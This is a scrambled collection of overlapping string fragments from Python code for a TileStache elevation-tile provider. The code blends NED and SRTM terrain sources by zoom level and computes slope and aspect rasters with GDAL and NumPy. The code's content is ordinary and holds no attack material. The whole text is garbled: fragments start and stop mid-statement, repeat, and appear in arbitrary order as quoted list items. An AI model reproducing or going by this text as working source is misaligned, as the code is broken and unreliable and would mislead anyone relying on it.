terrible bottom, top = SRTM3, NED10m elif SRTM1.ideal_zoom", "array of slope and aspect, and minimal geographic information. \"\"\" self.tmpdir = tmpdir", "DEM datasources into destination datasets. # driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2,", "NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1. -", "pi. Logic here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0]", "xmin, ymin, xmax, ymax, zoom): \"\"\" Return an instance of SlopeAndAspect for requested", "self.slope.shape self.wkt = wkt self.xform = xform def save(self, output, format): \"\"\" Save", "composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None # # Calculate and save slope and aspect.", "alpha-blending. # do_blending = bool(proportion_complete > 0 and proportion < 1) if do_blending:", "ModestMaps.Core import Coordinate from TileStache.Geography import SphericalMercator from TileStache.Core import Layer, Metatile from", "maxlat, z = cs2cs.TransformPoint(xmax + xres, ymax - yres) # # Keep a", "Instantiate with array of slope and aspect, and minimal geographic information. \"\"\" self.tmpdir", "proportions must all add up to one. Return list has either one or", "\"\"\" cache = Disk(tiledir, dirs='safe') config = Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(),", "SRTM3, SRTM1 # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom", "elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion", "NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom < zoom and zoom < NED100m.ideal_zoom: #bottom,", "NED1km.ideal_zoom < zoom and zoom < NED100m.ideal_zoom: #bottom, top = NED1km, NED100m bottom,", "/ (8.0 * xres); y = ((window[6] + window[7] + window[7] + window[8])", "zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom and zoom <", "vsimem_counter = 1 # # Set up some useful projections. # osr.UseExceptions() #", "composite_ds.GetProjection(), resample) ds_dem = None # # Perform alpha-blending if needed. # if", "than the input elevation array. Slope is returned in radians, from 0 for", "#bottom, top = NED1km, NED100m bottom, top = NED1km, NED100m elif zoom ==", "= 0. for (module, proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get", "and zoom < NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m # SRTM1 looks terrible", "composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0])", "/ width yres = (ymin - ymax) / height area_wkt = webmerc_sref.ExportToWkt() buffered_xform", "GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on how the SlopeAndAspect object interacts with TileStache.", "point for DEM retrieval utilities. \"\"\" from math import pi, sin, cos from", "osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer for preparing tiled data.", "(8.0 * xres); y = ((window[6] + window[7] + window[7] + window[8]) \\", "renderArea(self, width, height, srs, xmin, ymin, xmax, ymax, zoom): \"\"\" Return an instance", "ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def", "sys import modules import NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core", "for use in hillup-seed.py script for preparing a tile directory. \"\"\" def __init__(self,", "- xmin) / width yres = (ymin - ymax) / height area_wkt =", "/vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # # Set up some useful", "_func is None: raise Exception('eval(%(objname)s) in %(modname)s came up None' % locals()) return", "float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1 - proportion)] def choose_providers_ned(zoom): \"\"\"", "one or two items. \"\"\" if zoom <= NED1km.ideal_zoom: return [(NED1km, 1)] elif", "slope and aspect data. Source parameter can be \"srtm-ned\" (default) or \"ned-only\". See", "[(bottom, proportion), (top, 1 - proportion)] def choose_providers_ned(zoom): \"\"\" Return a list of", "SphericalMercator from TileStache.Core import Layer, Metatile from TileStache.Config import Configuration from TileStache.Caches import", "self.xform, output, self.tmpdir) def crop(self, box): \"\"\" Returns a rectangular region from the", "or \"ned-only\". See http://tilestache.org/doc/#custom-providers for information on how the Provider object interacts with", "8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on how the SlopeAndAspect object interacts with", "zoom and zoom < NED100m.ideal_zoom: #bottom, top = NED1km, NED100m bottom, top =", "+ y*y)) # in radians counterclockwise, from -pi at north back to pi", "the Provider object interacts with TileStache. \"\"\" def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'):", "handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename, width, height, 1,", "y*y)) # in radians counterclockwise, from -pi at north back to pi aspect", "and zoom < SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1 # SRTM1 looks terrible", "# SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom >= NED10m.ideal_zoom:", "source='srtm-ned'): self.tmpdir = tmpdir self.demdir = demdir self.source = source def getTypeByExtension(self, ext):", "0 and proportion < 1) if do_blending: composite_without = composite_ds.ReadAsArray() ds_args = minlon,", "<= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom and zoom < SRTM1.ideal_zoom:", "minlat, maxlon, maxlat, self.demdir for ds_dem in module.datasources(*ds_args): # estimate the raster density", "gdal, osr from PIL import Image import numpy from .. import save_slope_aspect #", "# used to prevent clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1", "def choose_providers_srtm(zoom): \"\"\" Return a list of data sources and proportions for given", "based on a path. Example funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname = funcpath.split(':', 1)", "NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core import Coordinate from TileStache.Geography import", "TileStache response object with PIL-like save() and crop() methods. This object knows only", "TileStache.Config import Configuration from TileStache.Caches import Disk from osgeo import gdal, osr from", "(window[2] + window[5] + window[5] + window[8])) \\ / (8.0 * xres); y", "z = cs2cs.TransformPoint(xmax + xres, ymax - yres) # # Keep a version", "terrible bottom, top = SRTM3, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)]", "demdir self.source = source def getTypeByExtension(self, ext): if ext.lower() != 'tiff': raise Exception()", "= gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename, width,", "funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname = funcpath.split(':', 1) __import__(modname) module = modules[modname] _func", "level. Each data source is a module such as NED10m or NED1km, and", "col) in product(range(3), range(3))] x = ((window[0] + window[3] + window[3] + window[6])", "minlon, minlat, z = cs2cs.TransformPoint(xmin - xres, ymin + yres) maxlon, maxlat, z", "ymin + yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax + xres, ymax - yres)", "'TIFF' def renderArea(self, width, height, srs, xmin, ymin, xmax, ymax, zoom): \"\"\" Return", "z = cs2cs.TransformPoint(xmin - xres, ymin + yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax", "= composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon, maxlat, self.demdir for ds_dem in module.datasources(*ds_args):", "the proportions must all add up to one. Return list has either one", "= SRTM3, SRTM1 # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif", "= None # # Calculate and save slope and aspect. # slope, aspect", "a version of the composite without the # current layer applied for later", "= proportion / (proportion_complete + proportion) proportion_without = 1 - proportion_with composite_with =", "get a lat/lon bbox buffered by one pixel on all sides minlon, minlat,", "Provider object interacts with TileStache. \"\"\" def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir", "a lat/lon bbox buffered by one pixel on all sides minlon, minlat, z", "area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache response object with PIL-like save() and crop()", "== 1.0 # # Prepare information for datasets of the desired extent and", "from sys import modules import NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide from", "proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon bbox buffered", "class Provider: \"\"\" TileStache provider for generating tiles of DEM slope and aspect", "import modules import NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core import", "demdir, tmpdir, source) def name(self): return '.' class Provider: \"\"\" TileStache provider for", "self.wkt, self.xform, output, self.tmpdir) def crop(self, box): \"\"\" Returns a rectangular region from", "\"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a list of data sources and", "z=1.0): \"\"\" Return a pair of arrays 2 pixels smaller than the input", "out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None #", "maxlat, self.demdir for ds_dem in module.datasources(*ds_args): # estimate the raster density across source", "proportion / (proportion_complete + proportion) proportion_without = 1 - proportion_with composite_with = composite_ds.ReadAsArray()", "terrible bottom, top = SRTM3, NED10m elif SRTM1.ideal_zoom < zoom and zoom <", "PIL import Image import numpy from .. import save_slope_aspect # used to prevent", "return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache response object with", "size): \"\"\" \"\"\" cache = Disk(tiledir, dirs='safe') config = Configuration(cache, '.') Layer.__init__(self, config,", "* proportion_with composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion", "tiled data. Intended for use in hillup-seed.py script for preparing a tile directory.", "one. Return list has either one or two items. \"\"\" if zoom <=", "looks terrible bottom, top = SRTM3, NED10m elif zoom == SRTM1.ideal_zoom: #return [(SRTM1,", "data sources and proportions for given zoom level. Each data source is a", "elif zoom == NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom < zoom and zoom", "- proportion)] def make_empty_datasource(width, height, xform, wkt, tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff')", "prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width,", "range(3))] x = ((window[0] + window[3] + window[3] + window[6]) \\ - (window[2]", "sum([proportion for (mod, proportion) in providers]) == 1.0 # # Prepare information for", "\"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir) def crop(self, box): \"\"\"", "make_empty_datasource(width, height, xform, wkt, tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff') handle, filename =", "Keep a version of the composite without the # current layer applied for", "elif SRTM1.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m", "== NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom < zoom and zoom < NED10m.ideal_zoom:", "See http://tilestache.org/doc/#custom-providers for information on how the Provider object interacts with TileStache. \"\"\"", "in radians counterclockwise, from -pi at north back to pi aspect = numpy.arctan2(x,", "0, 0) proportion_complete += proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None #", "if format != 'TIFF': raise Exception('File format other than TIFF for slope and", "# Perform alpha-blending if needed. # if do_blending: proportion_with = proportion / (proportion_complete", "= Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self, demdir, tmpdir,", "tmpdir, source) def name(self): return '.' class Provider: \"\"\" TileStache provider for generating", "here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0] - 2,", "tile_height=size) self.provider = Provider(self, demdir, tmpdir, source) def name(self): return '.' class Provider:", "a pair of arrays 2 pixels smaller than the input elevation array. Slope", "top = SRTM3, SRTM1 # SRTM1 looks terrible bottom, top = SRTM3, NED10m", "elif NED100m.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top = NED100m, NED10m", "face to pi/2 for flat ground. Aspect is returned in radians, counterclockwise from", "funcpath.split(':', 1) __import__(modname) module = modules[modname] _func = eval(objname, module.__dict__) if _func is", "for information on how the SlopeAndAspect object interacts with TileStache. \"\"\" def __init__(self,", "is None: raise Exception('eval(%(objname)s) in %(modname)s came up None' % locals()) return _func", "+ window[1] + window[1] + window[2])) \\ / (8.0 * yres); # in", "= bool(proportion_complete > 0 and proportion < 1) if do_blending: composite_without = composite_ds.ReadAsArray()", "= (xmax - xmin) / composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: # cubic looks", "list of data sources and proportions for given zoom level. Each data source", "on how the Provider object interacts with TileStache. \"\"\" def __init__(self, layer, demdir,", "self.provider = Provider(self, demdir, tmpdir, source) def name(self): return '.' class Provider: \"\"\"", "1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return", "\"\"\" Instantiate with array of slope and aspect, and minimal geographic information. \"\"\"", "from .. import save_slope_aspect # used to prevent clobbering in /vsimem/, see: #", "GeoTIFF to output file-like object. \"\"\" if format != 'TIFF': raise Exception('File format", "NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom)", "bottom, top = NED100m, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference", "hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0] - 2, elevation.shape[1] - 2 window", "+ window[6]) \\ - (window[2] + window[5] + window[5] + window[8])) \\ /", "zoom level. Each data source is a module such as SRTM1 or SRTM3,", "external function based on a path. Example funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname =", "1 # # Set up some useful projections. # osr.UseExceptions() # <-- otherwise", "\"\"\" TileStache provider for generating tiles of DEM slope and aspect data. Source", "providers = choose_providers_srtm(zoom) elif self.source == 'ned-only': providers = choose_providers_ned(zoom) elif self.source ==", "preparing tiled data. Intended for use in hillup-seed.py script for preparing a tile", "zoom and zoom < SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1 # SRTM1 looks", "aspect data. Source parameter can be \"srtm-ned\" (default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers for", "0 to pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians", "Box is a 4-tuple with left, upper, right, and lower pixels. Not yet", "to pi/2 for flat ground. Aspect is returned in radians, counterclockwise from -pi", "# # Keep a version of the composite without the # current layer", "elevation.shape[0] - 2, elevation.shape[1] - 2 window = [z * elevation[row:(row + height),", "proportion), (top, 1 - proportion)] def make_empty_datasource(width, height, xform, wkt, tmpdir): ''' '''", "1)] elif SRTM3.ideal_zoom < zoom and zoom < SRTM1.ideal_zoom: #bottom, top = SRTM3,", "modules[modname] _func = eval(objname, module.__dict__) if _func is None: raise Exception('eval(%(objname)s) in %(modname)s", "(default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers for information on how the Provider object interacts", "= modules[modname] _func = eval(objname, module.__dict__) if _func is None: raise Exception('eval(%(objname)s) in", "arrays 2 pixels smaller than the input elevation array. Slope is returned in", "yres = (ymin - ymax) / height area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin", "ext): if ext.lower() != 'tiff': raise Exception() return 'image/tiff', 'TIFF' def renderArea(self, width,", "top = SRTM3, NED10m elif SRTM1.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom,", "NED100m, NED10m bottom, top = NED100m, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m,", "= tmpdir self.demdir = demdir self.source = source def getTypeByExtension(self, ext): if ext.lower()", "methods. This object knows only how to save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers", "elif self.source == 'ned-only': providers = choose_providers_ned(zoom) elif self.source == 'vfp': providers =", "= Disk(tiledir, dirs='safe') config = Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider", "Calculate and save slope and aspect. # slope, aspect = calculate_slope_aspect(elevation, xres, yres)", "gdal.GRA_Cubic else: # cubic spline looks better stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem,", "right, and lower pixels. Not yet implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\"", "array. Slope is returned in radians, from 0 for sheer face to pi/2", "Coordinate from TileStache.Geography import SphericalMercator from TileStache.Core import Layer, Metatile from TileStache.Config import", "ds_dem in module.datasources(*ds_args): # estimate the raster density across source DEM and output", "estimate the raster density across source DEM and output dem_samples = (maxlon -", "or two items. \"\"\" if zoom <= NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom", "raise Exception('File format other than TIFF for slope and aspect: \"%s\"' % format)", "assert srs == webmerc_proj.srs # <-- good enough for now if self.source ==", "> 0 and proportion < 1) if do_blending: composite_without = composite_ds.ReadAsArray() ds_args =", "minimal geographic information. \"\"\" self.tmpdir = tmpdir self.slope = slope self.aspect = aspect", "= float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1. - (zoom - float(bottom.ideal_zoom)) / difference", "from PIL import Image import numpy from .. import save_slope_aspect # used to", "[(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom and zoom < SRTM1.ideal_zoom: #bottom, top =", "xres, ymax - yres) # # Keep a version of the composite without", "# http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # # Set up some useful projections. #", "Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self, demdir, tmpdir, source) def name(self):", "width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0, 0)", "from os import unlink, close from itertools import product from tempfile import mkstemp", "- float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1 - proportion)] def make_empty_datasource(width,", "- proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with,", "import Image import numpy from .. import save_slope_aspect # used to prevent clobbering", "data source is a module such as SRTM1 or SRTM3, and the proportions", "= wkt self.xform = xform def save(self, output, format): \"\"\" Save a two-band", "counterclockwise, from -pi at north back to pi aspect = numpy.arctan2(x, y) return", "gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds", "from TileStache.Config import Configuration from TileStache.Caches import Disk from osgeo import gdal, osr", "is a module such as NED10m or NED1km, and the proportions must all", "from TileStache.Core import Layer, Metatile from TileStache.Config import Configuration from TileStache.Caches import Disk", "# # Set up some useful projections. # osr.UseExceptions() # <-- otherwise errors", "choose_providers_srtm(zoom) elif self.source == 'ned-only': providers = choose_providers_ned(zoom) elif self.source == 'vfp': providers", "= self.slope.shape self.wkt = wkt self.xform = xform def save(self, output, format): \"\"\"", "height area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin - xres, xres, 0, ymax -", "from -pi at north around to pi. Logic here is borrowed from hillshade.cpp:", "< NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m # SRTM1 looks terrible bottom, top", "ds_args = minlon, minlat, maxlon, maxlat, self.demdir for ds_dem in module.datasources(*ds_args): # estimate", "= None # # Perform alpha-blending if needed. # if do_blending: proportion_with =", "composite_without = composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon, maxlat, self.demdir for ds_dem in", "See http://tilestache.org/doc/#custom-providers for information on how the SlopeAndAspect object interacts with TileStache. \"\"\"", "height), col:(col + width)] for (row, col) in product(range(3), range(3))] x = ((window[0]", "xmin) / composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: # cubic looks better squeezing down", "clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # # Set up", "SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom >= NED10m.ideal_zoom: return", "providers = choose_providers_ned(zoom) elif self.source == 'vfp': providers = [(VFP, 1)] elif self.source", "given zoom level. Each data source is a module such as NED10m or", "window = [z * elevation[row:(row + height), col:(col + width)] for (row, col)", "= 1. - (zoom - float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1", "Each data source is a module such as NED10m or NED1km, and the", "the input elevation array. Slope is returned in radians, from 0 for sheer", "the raster density across source DEM and output dem_samples = (maxlon - minlon)", "aspect, and minimal geographic information. \"\"\" self.tmpdir = tmpdir self.slope = slope self.aspect", "height, xform, wkt, tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir,", "/ ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin) / composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels:", "source is a module such as NED10m or NED1km, and the proportions must", "NED1km, and the proportions must all add up to one. Return list has", "# SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom == SRTM1.ideal_zoom:", "gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None # # Perform alpha-blending", "if needed. # if do_blending: proportion_with = proportion / (proportion_complete + proportion) proportion_without", "top = NED1km, NED100m bottom, top = NED1km, NED100m elif zoom == NED100m.ideal_zoom:", "area_pixels = (xmax - xmin) / composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: # cubic", "is a module such as SRTM1 or SRTM3, and the proportions must all", "xmax, ymax, zoom): \"\"\" Return an instance of SlopeAndAspect for requested area. \"\"\"", "for (module, proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon", "up to one. Return list has either one or two items. \"\"\" if", "looks terrible bottom, top = SRTM3, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m,", "- xmin) / composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: # cubic looks better squeezing", "is returned in radians, from 0 for sheer face to pi/2 for flat", "Return an instance of SlopeAndAspect for requested area. \"\"\" assert srs == webmerc_proj.srs", "http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # # Set up some useful projections. # osr.UseExceptions()", "of the desired extent and projection. # xres = (xmax - xmin) /", "projection. # xres = (xmax - xmin) / width yres = (ymin -", "= tmpdir self.slope = slope self.aspect = aspect self.w, self.h = self.slope.shape self.wkt", "return [(NED10m, 1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1. - (zoom", "col:(col + width)] for (row, col) in product(range(3), range(3))] x = ((window[0] +", "Source parameter can be \"srtm-ned\" (default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers for information on", "the SlopeAndAspect object interacts with TileStache. \"\"\" def __init__(self, tmpdir, slope, aspect, wkt,", "with TileStache. \"\"\" def __init__(self, tmpdir, slope, aspect, wkt, xform): \"\"\" Instantiate with", "output, format): \"\"\" Save a two-band GeoTIFF to output file-like object. \"\"\" if", "see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # # Set up some useful projections.", "area. \"\"\" assert srs == webmerc_proj.srs # <-- good enough for now if", "xmin) / width yres = (ymin - ymax) / height area_wkt = webmerc_sref.ExportToWkt()", "module.__dict__) if _func is None: raise Exception('eval(%(objname)s) in %(modname)s came up None' %", "+ xres, ymax - yres) # # Keep a version of the composite", "such as NED10m or NED1km, and the proportions must all add up to", "product(range(3), range(3))] x = ((window[0] + window[3] + window[3] + window[6]) \\ -", "# <-- good enough for now if self.source == 'srtm-ned': providers = choose_providers_srtm(zoom)", "def save(self, output, format): \"\"\" Save a two-band GeoTIFF to output file-like object.", "two-band GeoTIFF to output file-like object. \"\"\" if format != 'TIFF': raise Exception('File", "proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds =", "tmpdir, source, size): \"\"\" \"\"\" cache = Disk(tiledir, dirs='safe') config = Configuration(cache, '.')", "module = modules[modname] _func = eval(objname, module.__dict__) if _func is None: raise Exception('eval(%(objname)s)", "ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return a pair of", "SRTM3.ideal_zoom < zoom and zoom < SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1 #", "self.source == 'vfp': providers = [(VFP, 1)] elif self.source == 'worldwide': providers =", "+ window[8]) \\ - (window[0] + window[1] + window[1] + window[2])) \\ /", "return 'image/tiff', 'TIFF' def renderArea(self, width, height, srs, xmin, ymin, xmax, ymax, zoom):", "Perform alpha-blending if needed. # if do_blending: proportion_with = proportion / (proportion_complete +", "ymax, zoom): \"\"\" Return an instance of SlopeAndAspect for requested area. \"\"\" assert", "and zoom < NED10m.ideal_zoom: #bottom, top = NED100m, NED10m bottom, top = NED100m,", "Intended for use in hillup-seed.py script for preparing a tile directory. \"\"\" def", "getTypeByExtension(self, ext): if ext.lower() != 'tiff': raise Exception() return 'image/tiff', 'TIFF' def renderArea(self,", "0, ymax - yres, 0, yres # # Reproject and merge DEM datasources", "proportion) proportion_without = 1 - proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with composite_with +=", "proportion = 1. - (zoom - float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top,", "cs2cs.TransformPoint(xmin - xres, ymin + yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax + xres,", "how to save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on how the", "to one. Return list has either one or two items. \"\"\" if zoom", "def make_empty_datasource(width, height, xform, wkt, tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff') handle, filename", "'vfp': providers = [(VFP, 1)] elif self.source == 'worldwide': providers = [(Worldwide, 1)]", "webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer for preparing", "top = NED100m, NED10m bottom, top = NED100m, NED10m elif zoom >= NED10m.ideal_zoom:", "window[5] + window[5] + window[8])) \\ / (8.0 * xres); y = ((window[6]", "import Coordinate from TileStache.Geography import SphericalMercator from TileStache.Core import Layer, Metatile from TileStache.Config", "level. Each data source is a module such as SRTM1 or SRTM3, and", "+= composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion elevation = composite_ds.ReadAsArray()", "Returns a rectangular region from the current image. Box is a 4-tuple with", "Layer, Metatile from TileStache.Config import Configuration from TileStache.Caches import Disk from osgeo import", "lat/lon bbox buffered by one pixel on all sides minlon, minlat, z =", "self.h = self.slope.shape self.wkt = wkt self.xform = xform def save(self, output, format):", "slope, aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin, xres, 0, ymax, 0,", "import unlink, close from itertools import product from tempfile import mkstemp from sys", "ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres,", "to output file-like object. \"\"\" if format != 'TIFF': raise Exception('File format other", "Tilestache-compatible seeding layer for preparing tiled data. Intended for use in hillup-seed.py script", "SlopeAndAspect: \"\"\" TileStache response object with PIL-like save() and crop() methods. This object", "source def getTypeByExtension(self, ext): if ext.lower() != 'tiff': raise Exception() return 'image/tiff', 'TIFF'", "NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m # SRTM1 looks terrible bottom, top =", "and aspect, and minimal geographic information. \"\"\" self.tmpdir = tmpdir self.slope = slope", "looks better stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem", "choose_providers_srtm(zoom): \"\"\" Return a list of data sources and proportions for given zoom", "tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle)", "+ window[7] + window[8]) \\ - (window[0] + window[1] + window[1] + window[2]))", "cos from os import unlink, close from itertools import product from tempfile import", "information. \"\"\" self.tmpdir = tmpdir self.slope = slope self.aspect = aspect self.w, self.h", "proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0,", "math import pi, sin, cos from os import unlink, close from itertools import", "\"\"\" Tilestache-compatible seeding layer for preparing tiled data. Intended for use in hillup-seed.py", "borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0] - 2, elevation.shape[1] -", "import mkstemp from sys import modules import NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP,", "interacts with TileStache. \"\"\" def __init__(self, 